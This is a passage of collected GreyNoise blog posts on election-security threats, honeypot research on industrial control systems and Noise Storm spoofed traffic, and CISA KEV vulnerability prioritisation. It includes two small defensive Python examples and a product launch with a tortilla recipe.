
What Are Hackers Searching for in SolarWinds Serv-U (CVE-2024-28995)?

GreyNoise’s honeypots have been actively monitoring exploit attempts targeting the SolarWinds Serv-U vulnerability (CVE-2024-28995), revealing exactly what files attackers are after. From key system files to credential-containing configuration files, our data shows how attackers are scanning for vulnerable systems in real time.

GreyNoise interacts directly with attackers through its honeypots, providing verifiable, firsthand data. This gives security teams a clearer, more accurate picture of real-time threats, allowing them to cut through the noise and focus on what's truly malicious.

Read the full blog now!

Phishing and Social Engineering: The Human Factor in Election Security

(This is part three in our "Understanding the Election Cybersecurity Landscape" series.)

As we rapidly approach the 2024 U.S. elections, the human element remains one of the most vulnerable aspects of our electoral system. While technological defenses continue to evolve, state actors and cybercriminals in general are increasingly turning to phishing and social engineering tactics to exploit human psychology and gain unauthorized access to sensitive information or systems. These attacks pose a significant threat to election integrity by targeting election officials, campaign staff, and voters alike.

The Anatomy of Election-Related Phishing Attacks

Phishing attacks during election seasons often exploit the heightened emotions and time pressures associated with political campaigns. Attackers craft convincing emails, text messages, or social media posts that appear to come from trusted sources such as election boards, political parties, or candidates themselves. These messages typically create a sense of urgency or importance to prompt quick, unthinking responses from targets.

For example, an election official might receive an email that appears to be from a voting machine vendor, claiming there's a critical security update that needs immediate attention. The email could contain a malicious link or attachment that, when clicked, installs malware or captures login credentials. Similarly, voters might receive text messages with false information about polling place changes or registration requirements, containing links to fraudulent websites designed to steal personal information.

Social Engineering: Exploiting Trust and Authority

Social engineering attacks go beyond simple phishing by leveraging more complex psychological manipulation. These attacks often involve multiple touchpoints and can unfold over extended periods, making them particularly insidious.

In the context of elections, a social engineering attack might involve an attacker posing as an IT support technician, contacting county election workers with offers of assistance. Over time, the attacker builds trust and may eventually request remote access to systems or sensitive information under the guise of providing support. This type of attack exploits the often-overworked and under-resourced nature of many local election offices.

Another common tactic is impersonating authority figures. An attacker might pose as a high-ranking election official or party leader, using this perceived authority to pressure lower-level staff into bypassing security protocols or divulging confidential information.

The Cascading Impact on Election Security

The consequences of successful phishing and social engineering attacks can be far-reaching. A single compromised account or system can serve as an entry point for broader network infiltration, potentially leading to:

  • Disruption of election management systems, including those that are responsible for updating public-facing results on and after election day
  • Theft or manipulation of voter registration data
  • Unauthorized access to voting machine software or configurations
  • Leaks of sensitive campaign strategies or communications
  • Spread of disinformation from trusted sources

Moreover, even unsuccessful attacks can erode public confidence in the electoral process. The mere perception that election systems or officials might be compromised can fuel doubts about election integrity, which could be especially problematic this year.

Defending Against the Human Factor

Mitigating the risks posed by phishing and social engineering requires a multi-faceted approach that combines technological solutions with robust human training and awareness programs.

Technical Safeguards

  • Implement strong email filtering and anti-phishing tools
  • Use multi-factor authentication for all critical systems
  • Regularly update and patch software to address known vulnerabilities
  • Employ network segmentation to limit the potential spread of breaches

Human-Focused Defenses

  • Conduct regular, scenario-based training for election officials and staff
  • Develop clear communication protocols for sharing sensitive information
  • Establish verification procedures for requests involving system access or data transfers
  • Create a culture of security awareness where staff feel empowered to question suspicious or urgent requests

Public Education

  • Launch voter education campaigns on recognizing election-related phishing attempts
  • Provide clear, authoritative sources for election information
  • Encourage critical thinking and verification of election-related messages
  • Ensure there is a clear way for voters to recognize legitimate municipal communications, and provide straightforward ways for them to validate potentially illegitimate ones

The Road Ahead

As we move ever closer to the 2024 elections, the sophistication of phishing and social engineering attacks is likely to increase. The rise of AI-generated content, including deepfakes, will make it even more challenging to distinguish legitimate communications from fraudulent ones (something we will cover in the final installment).

However, by focusing on the human element – both in terms of vulnerabilities and strengths – we can build a more resilient election security ecosystem. Empowering election officials and voters with knowledge and critical thinking skills is our best defense against these evolving threats.

The integrity of our elections depends not just on secure technology, but on a vigilant and informed populace. By recognizing the central role of human factors in election security, we can work towards elections that are not only technologically sound but also trusted and resilient in the face of increasingly sophisticated attacks.

Challenging Assumptions: Enhancing the Understanding of Securing Internet-Exposed Industrial Control Systems

Censys and GreyNoise teamed up for the last three months to shed new light on the real-world threats facing internet-exposed industrial control systems (ICS). At LABSCon 2024, they shared their findings, challenging some long-held assumptions about ICS security.

Earlier this year, Censys researchers identified over 40,000 internet-connected ICS devices in the U.S., including over 400 human-machine interfaces (HMIs). Many of these interfaces required no authentication at the time of observation. HMIs provide easy-to-understand and easy-to-manipulate interfaces, which make them low-hanging targets for threat actors seeking to disrupt operations. Given the relative ease of manipulation, we were curious about the actual attack traffic such interfaces receive.

To conduct preliminary research, GreyNoise set up hyper-realistic emulations of internet-connected HMIs for critical control systems, camouflaging them by geography and ASNs. Glenn Thorpe, Sr. Director, Security Research & Detection Engineering at GreyNoise, analyzed forty-five days of data and arrived at these surprising and concerning findings:

  1. Rapid Targeting: Internet-connected HMIs were probed and scanned more quickly than baseline control sensors. Over 30% of IPs that touched the HMIs before a typical GreyNoise sensor were later identified as malicious.
  2. Focus on Remote Access: Contrary to expectations, attackers primarily targeted common Remote Access Service (RAS) protocols rather than ICS-specific communication protocols. Virtual Network Computing (VNC) was of particular interest to threat actors.

Implications for ICS Security

This research highlights a potential disconnect between perceived risks and actual threat actor behavior toward internet-exposed ICS. While the industry has long focused on securing ICS-specific communication protocols, the more pressing threat may lie in more common, easily exploitable entry points like remote access services. The swift targeting suggests a prioritization for probing such devices online.

This research underscores the critical importance of securing remote access services as a frontline defense for ICS environments. The relative ease of targeting these generic entry points may often render the exploitation of specialized ICS protocols unnecessary.

GreyNoise and Censys intend to continue this research to learn more based on these experimental findings.

GreyNoise Reveals New Internet Noise Storm: Secret Messages and the China Connection

GreyNoise Intelligence has been tracking a mysterious and increasingly concerning phenomenon since January 2020: massive waves of spoofed traffic, known as “Noise Storms.”  These events have stumped cybersecurity experts and now pose new, complex risks, demanding attention from security professionals worldwide. These persistent mysteries add new layers of complexity to the cybersecurity landscape, prompting security leaders to reevaluate their defenses and ensure they are equipped with the right tools for an ironclad security posture. 

We discussed this in detail in this week’s episode of Storm⚡Watch which you can view or listen to for a broader context.

Executive Summary

Multiple Theories, No Clear Explanation

Despite ongoing research, no definitive explanation for these mysterious storms has emerged. Experts debate whether they could represent covert communications, Distributed Denial of Service (DDoS) attacks, or misconfigurations, leaving critical questions unanswered.

Global and Targeted Impact

Millions of spoofed IPs are flooding key internet providers like Cogent and Lumen while strategically avoiding AWS — suggesting a sophisticated, potentially organized actor with a clear agenda. 

International Connection

Although traffic appears to originate from Brazil, deeper connections to Chinese platforms like QQ, WeChat, and WePay raise the possibility of deliberate obfuscation, complicating efforts to trace the true source and purpose.

Sophisticated Tactics

Advanced techniques such as TTL manipulation, OS emulation, and precise targeting make these Noise Storms not only difficult to detect but challenging to block. 

These characteristics suggest a sophisticated actor with specific goals, but the ultimate purpose remains elusive. 

Noise Storms: What GreyNoise is Seeing

Noise Storms typically manifest as millions of spoofed IP addresses generating highly unusual network activity, primarily focusing on TCP connections to port 443 (HTTPS) and ICMP packets — leaving cybersecurity experts perplexed.

Interestingly, we've observed almost no UDP traffic associated with these events, making detection tools fine-tuned for UDP-based attacks less effective.

Recent traffic suggests Brazil as the apparent origin of these spoofed packets, but we believe this is likely another layer of obfuscation, adding to the growing uncertainty about the true source.

In our ongoing monitoring, several intriguing characteristics have emerged:

  1. Intelligent TTL Spoofing: Time To Live (TTL) values are set between 120 and 200, mimicking realistic network hops.
  2. OS Emulation: TCP traffic cleverly spoofs window sizes to emulate packets from various operating systems.
  3. Targeted Approach: Recent storms have become more focused, hitting smaller segments of the internet with increased intensity.
  4. Selective Targeting: While earlier storms impacted a broad range of infrastructure, recent events have notably avoided AWS while still affecting other major providers like Cogent, Lumen, and Hurricane Electric.

These characteristics suggest a sophisticated actor with an agenda; however, the purpose of these activities remains unclear to experts. 

A Secret Message? The "LOVE" Mystery

A curious feature of recent Noise Storms is the inclusion of the ASCII string "LOVE" embedded within the ICMP packets, along with other varying bytes. This seemingly benign message only adds to the intrigue, leaving experts questioning whether these storms might serve as a covert communication channel.
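The traits listed above (TCP to port 443 or ICMP, almost no UDP, TTLs in the 120 to 200 band, varied TCP window sizes, and the "LOVE" marker in ICMP payloads) can be turned into a triage heuristic for a traffic sample. The following is an added example, not GreyNoise code: the packet records are constructed summaries rather than real captures, and the thresholds in `looks_like_noise_storm` are assumptions for illustration.

```python
"""Heuristic triage of a packet sample for the Noise Storm traits described in the post.

Added example, not GreyNoise code. Packet objects are constructed summaries of
the fields a capture tool would give you (source, protocol, destination port,
TTL, TCP window, ICMP payload). Thresholds are assumptions for illustration.
"""
from collections import Counter
from dataclasses import dataclass
from typing import Optional

TTL_LOW, TTL_HIGH = 120, 200   # TTL band reported in the post
MARKER = b"LOVE"               # ASCII string seen inside ICMP payloads


@dataclass
class Packet:
    src: str
    proto: str                   # "tcp", "udp" or "icmp"
    dst_port: Optional[int] = None
    ttl: int = 64
    window: Optional[int] = None  # TCP window size, if any
    payload: bytes = b""          # ICMP payload bytes, if any


def storm_stats(packets):
    """Aggregate the per-sample signals the post describes into shares and counts."""
    n = len(packets)
    counts = Counter()
    sources, windows = set(), set()
    for p in packets:
        sources.add(p.src)
        if p.proto == "tcp" and p.dst_port == 443:
            counts["tcp443"] += 1
            if p.window is not None:
                windows.add(p.window)   # spread of window sizes hints at OS emulation
        elif p.proto == "icmp":
            counts["icmp"] += 1
            if MARKER in p.payload:
                counts["love"] += 1
        elif p.proto == "udp":
            counts["udp"] += 1
        if TTL_LOW <= p.ttl <= TTL_HIGH:
            counts["ttl_band"] += 1
    return {
        "packets": n,
        "sources": len(sources),
        "tcp443_share": counts["tcp443"] / n,
        "icmp_share": counts["icmp"] / n,
        "udp_share": counts["udp"] / n,
        "ttl_band_share": counts["ttl_band"] / n,
        "love_icmp": counts["love"],
        "distinct_tcp_windows": len(windows),
    }


def looks_like_noise_storm(stats, min_sources=5, max_udp_share=0.05,
                           min_443_icmp_share=0.9, min_ttl_band_share=0.9):
    """Flag a sample when many distinct sources, almost no UDP, traffic dominated by
    TCP/443 and ICMP, and TTLs in the 120-200 band occur together (assumed thresholds)."""
    return (stats["sources"] >= min_sources
            and stats["udp_share"] <= max_udp_share
            and stats["tcp443_share"] + stats["icmp_share"] >= min_443_icmp_share
            and stats["ttl_band_share"] >= min_ttl_band_share)


# Constructed sample resembling the storm traits: six spoofed sources, TTLs in band,
# mixed TCP window sizes, and "LOVE" embedded among other bytes in ICMP payloads.
STORM_SAMPLE = [
    Packet("203.0.113.1", "tcp", 443, ttl=128, window=65535),
    Packet("203.0.113.2", "tcp", 443, ttl=130, window=8192),
    Packet("203.0.113.3", "tcp", 443, ttl=199, window=29200),
    Packet("203.0.113.4", "icmp", ttl=150, payload=b"\x10\x42LOVE\x07\x99"),
    Packet("203.0.113.5", "icmp", ttl=121, payload=b"LOVE\x00\x01"),
    Packet("203.0.113.6", "tcp", 443, ttl=160, window=64240),
]

# Constructed baseline: few sources, UDP present, TTLs outside the band.
BASELINE_SAMPLE = [
    Packet("198.51.100.7", "tcp", 80, ttl=52, window=64240),
    Packet("198.51.100.7", "udp", 53, ttl=52),
    Packet("198.51.100.8", "tcp", 443, ttl=57, window=64240),
    Packet("198.51.100.9", "udp", 123, ttl=240),
]

if __name__ == "__main__":
    for name, sample in (("storm", STORM_SAMPLE), ("baseline", BASELINE_SAMPLE)):
        s = storm_stats(sample)
        print(name, looks_like_noise_storm(s), s)
```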

The China Link: Harmless or Something More? 

Our analysis has revealed that the Autonomous System Number (ASN) associated with the ICMP traffic is linked to a Content Delivery Network (CDN) servicing major Chinese platforms like QQ, WeChat, and WePay. This connection raises further concerns about deliberate obfuscation, suggesting that more sophisticated actors could be involved.


Potential Motivations and Consequences

Despite years of observation and analysis, the true nature of Noise Storms remains elusive. Theories within the cybersecurity community include:

  • Covert communication channels
  • Sophisticated DDoS attempts
  • Misconfigured routers
  • Elaborate command and control mechanisms
  • Attempts to create network congestion for traffic manipulation

The persistence and evolution of Noise Storms over four years underscore the complexity of modern cyber threats. As these events continue to adapt and puzzle researchers, they serve as a reminder of the ever-changing landscape of internet security.

Key Actions for Security Professionals

Noise Storms are a reminder that threats can manifest in unusual and bizarre ways, highlighting the need for adaptive strategies and tools that go beyond traditional security measures. Here are some key takeaways for security leaders:

  • Prioritize What Matters: With an overwhelming number of alerts, it’s critical to employ tools that cut through irrelevant noise and prioritize actionable threats. 
  • Optimize Resource Efficiency: With security teams under immense pressure, solutions that reduce false positives can help optimize time and resources. 
  • Be Proactive: Reactivity is no longer sufficient. Noise Storms demonstrate that security is about anticipating and mitigating risks before they cause disruption. 
  • Use Actionable Intelligence: Sophisticated threats require real-time, actionable intelligence capable of detecting traffic anomalies like Noise Storms — and any black swan that may follow. 

GreyNoise Intelligence remains committed to investigating this phenomenon and will continue to share our findings with the cybersecurity community. We encourage network operators and security researchers to remain vigilant and report any similar observations to help unravel this ongoing internet mystery.

Join the Investigation

We’ve published packet captures (PCAPs) of the two recent storm events up in GitHub for the community to poke at. We’d love to know what you find! You can contact us at research@greynoise.io with any questions or discoveries.

The Role of State-Sponsored Actors in Election Interference

(This is part two in our "Understanding the Election Cybersecurity Landscape" series.)

State-sponsored actors play a critical role in election interference, employing a range of tactics to undermine the integrity of the electoral process. These actors, often backed by powerful nations like Russia, China, and Iran, have the resources and motivation to conduct sophisticated attacks that can erode public trust in elections.

Tactics and Techniques

State-sponsored actors engage in various activities interfering with elections, including cyberespionage, disinformation campaigns, and direct attacks on election infrastructure. Cyberespionage involves the theft of sensitive information, such as voter data or campaign communications, which can be used to influence public opinion or blackmail candidates. Disinformation campaigns, often conducted through social media, aim to spread false or misleading information to manipulate voter perceptions and sow discord. For example, Russia has been known to use fake personas and highly networked accounts to spread hyper-partisan themes effectively and quickly.

Direct attacks on election infrastructure are also a concern, as they can disrupt the voting process and undermine the integrity of election results. This includes attempts to gain physical or digital access to election systems, which can compromise their confidentiality, availability, or integrity. For instance, the Justice Department recently indicted two Russian propagandists associated with the state-funded media outlet RT for allegedly engaging in money laundering and channeling nearly $10 million to a right-leaning media organization.

We've also seen evidence of a recent suspected Iranian attack against the campaign of Republican presidential nominee Donald Trump, potentially resulting in the theft of internal campaign documents. The FBI is investigating the matter, as well as attempts to infiltrate President Joe Biden's reelection campaign, which became Vice President Kamala Harris' campaign after Biden dropped out of the race.

Impact and Implications

The activities of state-sponsored actors in election interference have significant implications for democratic societies. By undermining public trust in the electoral process, these actors can erode the legitimacy of governments and create social divisions. For example, research suggests that election interference campaigns can intensify internal divisions within a target state, making it harder for the political establishment to agree on priorities, implement policy, and respond to challenges from foreign actors.

Countermeasures

To counter the threats posed by state-sponsored actors, it is essential to understand their methods and recognize the signs of such interference. This includes investing in cybersecurity efforts for political campaigns, encouraging social media companies to remove deceptive or hateful posts, and passing legislation requiring online political ads to adhere to certain standards of truthfulness. Additionally, election officials should take steps to harden infrastructure against common attacks, utilize account security tools, and rehearse incident response plans.

What Can You Do?

Understanding the methods of state-sponsored actors and recognizing the signs of such interference is crucial in developing robust defenses. By investing in cybersecurity, promoting transparency in political advertising, and enhancing election infrastructure security, we can mitigate the risks posed by these actors and protect the integrity of democratic elections.

We've put together the following list of resources to help folks further understand and defend against this very real and present threat:

  • Election Cybersecurity Landscape: The global election cybersecurity landscape is characterized by diverse targets, tactics, and threats, with state-sponsored actors posing the most serious cybersecurity risk to elections.
  • Hybrid Warfare: Election interference is often a key tactic of hybrid warfare campaigns, which seek to exacerbate internal divisions within a target state through tactics such as disinformation and cyberattacks.
  • Election Security Measures: Election officials should take steps to harden infrastructure against common attacks, utilize account security tools, and rehearse incident response plans to protect against cyber, physical, and operational security risks.
  • Countering Foreign Interference: Countering foreign interference in U.S. elections requires understanding how adversaries exploit fault lines within society and using strategies such as collecting open-source intelligence on social media and releasing public service announcements to warn about strategic threats.
  • Recent Influence Operations: Recent foreign influence operations have been identified, including those perpetrated by Russia, China, and Iran, which have been accused of conducting complex campaigns to manipulate U.S. politics.

BLUUID: Firewallas, Diabetics, And… Bluetooth

We're excited to share a groundbreaking new blog post from our Labs team that dives deep into the world of Bluetooth Low Energy (BTLE) device identification and vulnerability research. In "BLUUID: Firewallas, Diabetics, And... Bluetooth," our very own Remy explores the fascinating and often overlooked realm of BTLE security.

This comprehensive analysis covers everything from building a BTLE Generic Attribute (GATT) Universally Unique Identifiers (UUIDs) database to remotely identifying Bluetooth devices for vulnerability research. Remy doesn't just stop at theory – he demonstrates real-world implications by uncovering and responsibly disclosing vulnerabilities in Firewalla firewall products.

But why should you care about BTLE security? As Remy points out, the impact extends far beyond just privacy concerns. Recent incidents involving BTLE-enabled insulin pumps highlight the potential for physical harm when these systems are compromised or malfunction.

In this blog, you'll learn:

  • How to build a database of BTLE UUIDs for remote device identification
  • Techniques for extracting identifying attributes from Android APKs
  • Real-world application of these methods in vulnerability research
  • Insights into the current state of BTLE security in healthcare devices

Whether you're a cybersecurity professional, IoT enthusiast, or simply curious about the hidden world of Bluetooth, this blog post offers valuable insights and practical techniques you won't want to miss.

Ready to dive in? Head over to the GreyNoise Labs blog to read the full article and expand your understanding of BTLE security and its far-reaching implications.

Unveiling Vulnerability Insights from the CISA KEV Catalog at BSidesLV

Last week at BSidesLV, I had the privilege to explore the complexities of CISA's Known Exploited Vulnerabilities (KEV) Catalog. This vital resource aids organizations in understanding which vulnerabilities are actively exploited and how to prioritize remediation efforts effectively.

Here, I’ll share three key insights from my analysis that can enhance vulnerability management strategies.

The full talk (it's only 20 minutes, but I clearly could have used 30!) can be found here, and the slides and dataset used can be found here.

The Decreasing Age of CVEs Added to KEV

The average age of CVEs added to the KEV decreases over time. In 2023, which we consider the first full baseline year, most vulnerabilities were added within the first week of their assignment. This trend suggests not only that vulns are being exploited faster (we know this) but also that information sharing and partnerships between CISA and other organizations have improved.

Additionally, the shift towards younger CVEs being added to KEV is encouraging as it indicates that the security community is becoming more proactive in identifying exploitation. For organizations, this means staying vigilant and ready to respond quickly to newly disclosed vulnerabilities, as they're more likely to be added to the KEV shortly after discovery.

The Fluidity of the "Known Ransomware Campaign Use" Field

A lesser-known aspect of the KEV data is that it's not static. 

In October 2023, CISA added a field called "known ransomware campaign use" to the catalog. We found that this field is updated silently and can change from "unknown" to "known" without fanfare. From October 2023 → July 2024, this field was updated 41 times.

Research suggests that vulnerabilities flagged for known ransomware use are patched 2.5 times faster; this makes sense given the significant financial and operational impacts of ransomware attacks. Organizations should pay close attention to this field and regularly check for updates. It goes without saying that if a vulnerability in your environment is flagged for known ransomware use, it should be prioritized for patching immediately.

Prioritization Insights from within the KEV Data

Another interesting finding is that by considering two data points from within the KEV, you can discern a “level of concern” that organizations can use to make more informed decisions about which vulnerabilities to address first when resources are limited.

1. The time that is given to fix the vulnerability.

Early on, the time to fix a vulnerability was either 14 or 180 days. Shortly after the Russia/Ukraine war, CISA seemed to adjust to a 21-day fixed period. However, if you look at the bottom right of the plot, you'll notice that there have been a handful of vulnerabilities with even shorter fix timelines in the last year.

2. The day of the week the vulnerability was added to the KEV.

Interestingly, the day of the week a vulnerability is added can be telling. In the past year+, there have only been two drops on a Friday, and both had a time to fix of 7 days (a time to fix of 7 days has only happened six more times). Overall, the time to fix has standardized to 21 days for most entries, but shorter timeframes indicate higher-priority vulnerabilities. 
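The two prioritization signals above (time given to fix, and day of the week added) and the silently changing ransomware field can be derived directly from the catalog records. The following is an added example, not code from the talk, the dataset, or CISA: the records are constructed, use placeholder CVE IDs, and follow the field names of the KEV JSON feed (`cveID`, `dateAdded`, `dueDate`, `knownRansomwareCampaignUse`); the concern labels and their cut-offs are an assumption built on the 21-day norm and 7-day minimum the post describes.

```python
"""Deriving a 'level of concern' from KEV-style records.

Added example, not code from the talk or from CISA. Records are constructed,
with placeholder CVE IDs (year 0000), and use the KEV JSON feed field names.
The concern labels and cut-offs are an assumption for illustration.
"""
from datetime import date

DAYS = ["Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"]
ORDER = {"critical": 0, "high": 1, "standard": 2, "routine": 3}


def days_to_fix(entry):
    """Due window in days: dueDate minus dateAdded."""
    return (date.fromisoformat(entry["dueDate"]) - date.fromisoformat(entry["dateAdded"])).days


def day_added(entry):
    """Weekday name of dateAdded, locale-independent."""
    return DAYS[date.fromisoformat(entry["dateAdded"]).weekday()]


def concern_level(entry):
    """Assumed ranking: known ransomware use or a 7-day window is critical, anything
    shorter than the 21-day norm is high, 21 days is standard, longer (e.g. the old
    180-day windows) is routine."""
    ttf = days_to_fix(entry)
    ransomware = entry.get("knownRansomwareCampaignUse", "Unknown").lower() == "known"
    if ransomware or ttf <= 7:
        return "critical"
    if ttf < 21:
        return "high"
    if ttf == 21:
        return "standard"
    return "routine"


def friday_short_drops(catalog):
    """Entries added on a Friday with a 7-day-or-shorter window (the pattern noted above)."""
    return [e["cveID"] for e in catalog if day_added(e) == "Friday" and days_to_fix(e) <= 7]


def ransomware_field_changes(old_catalog, new_catalog):
    """CVE IDs whose knownRansomwareCampaignUse value changed between two snapshots,
    since the field is updated silently and must be diffed to be noticed."""
    old = {e["cveID"]: e.get("knownRansomwareCampaignUse") for e in old_catalog}
    changes = []
    for e in new_catalog:
        cve, new_val = e["cveID"], e.get("knownRansomwareCampaignUse")
        if cve in old and old[cve] != new_val:
            changes.append((cve, old[cve], new_val))
    return changes


def triage(catalog):
    """Rows of (cveID, level, days to fix, weekday added), most concerning first."""
    rows = [(e["cveID"], concern_level(e), days_to_fix(e), day_added(e)) for e in catalog]
    return sorted(rows, key=lambda r: ORDER[r[1]])


# Constructed snapshot (placeholder IDs): a Friday 7-day drop, a standard 21-day entry,
# a legacy 180-day entry, and a 14-day entry.
OLD_SNAPSHOT = [
    {"cveID": "CVE-0000-1001", "dateAdded": "2024-06-14", "dueDate": "2024-06-21",
     "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-0000-1002", "dateAdded": "2024-06-13", "dueDate": "2024-07-04",
     "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-0000-1003", "dateAdded": "2022-01-10", "dueDate": "2022-07-09",
     "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-0000-1004", "dateAdded": "2024-05-01", "dueDate": "2024-05-15",
     "knownRansomwareCampaignUse": "Unknown"},
]

# Later snapshot: the ransomware field on the 21-day entry flipped to Known, silently.
NEW_SNAPSHOT = [dict(e) for e in OLD_SNAPSHOT]
NEW_SNAPSHOT[1]["knownRansomwareCampaignUse"] = "Known"

if __name__ == "__main__":
    for row in triage(NEW_SNAPSHOT):
        print(row)
    print("ransomware field changes:", ransomware_field_changes(OLD_SNAPSHOT, NEW_SNAPSHOT))
    print("friday short drops:", friday_short_drops(NEW_SNAPSHOT))
```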

To summarize, although the KEV catalog is mainly intended for government use, it provides valuable insights for prioritizing vulnerabilities. Cybersecurity professionals can enhance their remediation efforts by analyzing patterns such as vendor dominance, time given to fix, the day of the week an issue was added, and any changes to the ransomware field.

Again, the full talk can be found here, and the slides and dataset can be found here.

The Tortilla Test: Ensuring Your Vulnerability Intelligence is Always Fresh

All of my friends (and my bathroom scale, honestly) will tell you that I love tortillas.  Not just any tortillas, however…they have to be homemade.  I make sure we have homemade tortillas every week and keep them in the fridge.  They are better than anything you can buy in a store, and they are simply amazing when they are hot off the comal.  My kids know this; when they see the comal on the stove, they make a point of hanging around the kitchen to snag one (often a few!) while they are fresh because they understand that freshness is everything for tortillas.

It turns out the same is true for vulnerability intelligence!

In just the first 6 months of 2024, we’ve seen over 2,000 remotely exploitable, no-authentication-necessary CVEs be published.  These are the kinds of vulnerabilities that are exploited on the Internet - via APTs and criminals or botnets driving mass exploitation - every minute of every day.  This is a huge amount to deal with, and what we’ve seen this year is that they are occurring more frequently on edge devices that don’t have many mitigating controls to protect them.  When these things happen, it forces security teams to drop what they are doing and scramble for a fix.

There are many existing vulnerability prioritization solutions that can help by including information like “Known Exploits Available” or “In the Wild”. The issue is that these attributes quickly become stale.  Technically, a snippet of proof-of-concept code is an available exploit, but it isn’t the same as a mass exploitation attack by a criminal organization.  A hard-to-exploit race condition that requires a lot of time and effort might be “In the Wild”, but that doesn’t require the same urgency to fix as something an actor is actively exploiting today.  In many ways, these attributes (in addition to CVSS Base Scores, Vendor bulletins, etc) are like stale tortillas - edible but ultimately unsatisfying.

At GreyNoise we believe that security teams deserve actionable information that is fresh enough to know what attackers are doing right now, so that they can respond with the speed and urgency required.  Consequently, today we’re launching GreyNoise for Vulnerability Prioritization to give our customers exactly that.

Here’s how it works:

We run a global network of thousands of sensors that emulate the types of assets enterprises have exposed to the Internet:  web servers, network gear, etc.  We see when attackers and bots start probing them, and we collect the data as they are attacked in real-time.  We compare this against known bad behaviors and known IPs; our ML models are even capable of alerting us to unknown but suspicious or malicious activities that are the hallmarks of novel exploits. This is all unique, primary data that we collect rather than simply aggregating from third-party sources.  In other words, we make fresh tortillas from scratch rather than just reselling ones we bought from a supermarket.

As we collect this information, we make it immediately available via our Visualizer for ad-hoc usage and through our API for inclusion in your existing automation.  We ensure that information is always fresh, so that you can get the most up-to-date intel for as long as you need until you fix the problem.

There are many good vulnerability prioritization tools out there, but we believe that only we can tell vulnerability teams which CVEs need attention now based on what attacks are actually happening today.  Because Vuln Intel is based on all the same data that powers GreyNoise, you’ll also be able to share what you know seamlessly with your SOC analysts and threat hunters.

We think you’ll enjoy having fresh and actionable information with Greynoise Vulnerability Prioritization.  You can visit our website to learn more or schedule time to talk with us directly. 

I know you’ll also love having fresh and delicious tortillas, so please enjoy this recipe.  I look forward to hearing from you about both!

Flour Tortillas Recipe

Ingredients:

  • 4 parts all-purpose flour 
  • 0.1 part salt
  • 1 part lard (or shortening, but lard is the best)
  • 2 parts water - hot water for thin and chewy tortillas, cold water for thick and fluffy

For example, I find 300gm (4 x 75gm) flour + 75gm lard (1 x 75gm) + 8gm salt (0.1 x 75gm) mixed with 150gm (2 x 75gm) hot water makes 8 burrito-sized or 12 fajita-sized tortillas.

Instructions:

  • Place flour, salt, and lard in a bowl.  Add in water; if using hot water, give it 30 seconds to melt the lard.
  • Knead for 1 minute - it should be tacky but not so sticky it won't easily come off your fingers; you can add a little flour if needed.
  • Let stand covered for 30 minutes.
  • Heat a cast iron griddle (a skillet works too) on med-high for 5 minutes (i.e. at the 25-minute mark)
  • Divide the dough into golf ball-sized portions.
  • Using a rolling pin, roll one into 6-9 inch diameter rounds.
  • Cook 30 seconds on one side - you'll see bubbles form on the top when it is time to flip.  Now is a great time to roll the next round while it cooks.
  • Flip and cook for another 15-30 seconds; I like longer to get a few charred spots.
  • Stack on a plate and cover with a towel.

Eat them soon — they will be unbelievably good for 60 minutes, very good the rest of the day, and better than anything you can buy in the store for at least a week if you keep them in the fridge. 

Understanding the Election Cybersecurity Landscape

As we edge closer to the 2024 U.S. elections, the cybersecurity landscape surrounding this crucial event is more complex and dynamic than ever. The sheer variety of targets, tactics, and threats highlights the immense challenge of securing our democratic process. From state-sponsored entities to cybercriminals and hacktivists, a multitude of actors are ready to exploit any vulnerabilities they can find. Understanding this broad landscape is essential for grasping the challenges we face and appreciating the efforts required to safeguard our elections.

To help reduce any confusion, and provide some solid guidance, we’ve put together a multipart series that we’ll be releasing over the coming weeks. The goal is to help folks understand what’s truly at risk, along with helpful things you can do to join in the efforts to maintain and increase the cyber safety and resilience of America’s elections. We’re starting, today, with an overview of who and what is truly at risk, along with a high-level review of the adversaries and tactics in play. Over the remaining series, we’ll tackle:

  • the role of state-sponsored actors in election interference
  • phishing and social engineering
  • the threat of deepfakes and disinformation campaigns

Let’s dive in!

The Targets

When we think about election security, our minds often jump to voting machines and voter registries. While these are certainly critical, the attack surface extends far beyond them. Political campaigns, for instance, rely heavily on digital infrastructure, including websites, email systems, and databases. These elements are prime targets for cyber intrusions and disinformation campaigns designed to disrupt operations and erode public trust. Political parties, too, are vulnerable, with adversaries seeking to steal sensitive information or create chaos within their ranks.

News and social media platforms also play a crucial role in the election process. Unfortunately, they are frequently exploited to spread disinformation and sow discord among voters. Manipulating these platforms can have far-reaching consequences, influencing public opinion and undermining the democratic process. Election management systems, responsible for counting, auditing, and reporting results, are also critical targets. Ensuring the integrity of these systems is paramount to maintaining the credibility of the electoral outcome.

The Tactics

The tactics employed by threat actors are as diverse as the targets they pursue. Traditional cyber intrusions, such as phishing and spear phishing, remain prevalent, allowing adversaries to gain unauthorized access to sensitive systems and data. Distributed denial of service (DDoS) attacks aim to disrupt the availability of critical election-related websites and services, potentially causing widespread confusion and delays. Ransomware, which involves encrypting critical data and demanding payment for its release, poses a significant threat to election infrastructure, with the potential to cripple essential operations.

While most voting machines are not directly connected to the internet, they are still vulnerable to internet-based attacks through indirect means. For example, voting machines must accept electronic input files from other computers, such as ballot definition files prepared on Election Management System (EMS) computers. If these EMS computers are compromised, they can introduce fraudulent data or malicious code into the voting machines. This indirect connection to the internet creates a potential attack vector that sophisticated adversaries could exploit.

Recently, the rise of deepfakes and disinformation has added a new layer of complexity to the cybersecurity landscape. The use of AI-generated content to mislead voters and manipulate public opinion has become increasingly sophisticated, making it harder to discern truth from falsehood. These tactics are not only disruptive, but also corrosive, eroding trust in the electoral process and the institutions that support it.

The Actors

The actors behind these threats are varied, each with distinct motivations and capabilities. State-sponsored actors, including nations such as Russia, China, Iran, and North Korea, have been identified as significant threats. These entities aim to undermine U.S. elections to destabilize the country and influence its policies. Their sophisticated operations often involve a combination of cyber intrusions, disinformation campaigns, and other tactics designed to achieve strategic objectives.

Cybercriminals, on the other hand, are typically motivated by financial gain. They may deploy ransomware or sell stolen data on the “dark web”, exploiting vulnerabilities for profit. Hacktivists, driven by ideological beliefs, seek to promote their political agendas by disrupting election processes or exposing perceived injustices. While their methods may differ, the impact of their actions can be equally damaging.

The Importance of Vigilance

